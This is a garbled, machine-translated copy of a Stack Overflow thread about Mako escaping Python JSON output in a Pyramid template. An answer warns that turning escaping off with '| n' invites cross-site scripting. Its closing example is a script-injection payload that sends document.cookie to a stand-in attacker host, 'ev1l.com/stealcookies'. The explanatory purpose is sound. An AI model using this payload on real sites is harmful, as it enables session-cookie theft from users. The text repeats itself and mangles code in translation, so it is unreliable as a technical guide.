" 出现在JSONECODER输出中,输入是Python字符串列表
我正在读取一个文本文件,在" 出现在JSONECODER输出中,输入是Python字符串列表,python,json,pyramid,python-2.6,mako,Python,Json,Pyramid,Python 2.6,Mako,我正在读取一个文本文件,在\n上拆分它,并将结果放入Python列表中 然后我使用了jsonecoder().encode(mylist),但结果在生成javascript时抛出错误: var jslist = ["List item 1", "List item 2"] 我猜切换到单引号可以解决这个问题,但不清楚如何强制JSONECODER/python使用其中一个 更新:上下文是一个金字塔应用程序,下面是函数的结尾(组件是列表
\njsonecoder().encode(mylist)var jslist = ["List item 1", "List item 2"]
return {'components': JSONEncoder().encode(components)}
var components = ${components};
它将被如上所述替换。mako正在转义字符串,因为它在大多数情况下都是正常的默认值。您可以根据具体情况关闭转义:
${components | n}${components|n}user.name=“”+
“文件。写(“”);”
可嵌入HTML甚至Javascript(Python bug db中输入了一个bug)。同时,如果要在HTML页面上嵌入JSON,则应使用
确保_ascii=True”。由于Mako不知道脚本标记,因此它继续使用标准转义来转义字符串。但是
标记有不同的转义规则。值得注意的是,不转义会使您的站点容易出现CRO如果JSON包含用户生成的数据,则使用S-站点脚本攻击。在用户可编辑字段(用户名称)中考虑以下信息
user.name=“”+
“文件。写(“”);”
遗憾的是,Python JSON编码器没有一个安全编码JSON的选项,因此
可嵌入HTML甚至Javascript(Python bug db中输入了一个bug)。同时,您应该使用确保_ascii=True
+替换所有“JSONECODER不这样做,最有可能的结果输出是转义特殊字符。您将它传递给什么?使用金字塔/Mako详细信息更新。JSONECODER不这样做,最有可能的是您给出的任何内容n结果输出是转义特殊字符。您要将其传递给什么?使用Pyramid/Mako详细信息更新。
user.name = "</script><script language='javascript'>" +
"document.write('<img src=\'http://ev1l.com/stealcookies/?'" +
"+ document.cookie + '/>');</script><script language='vbscript'>"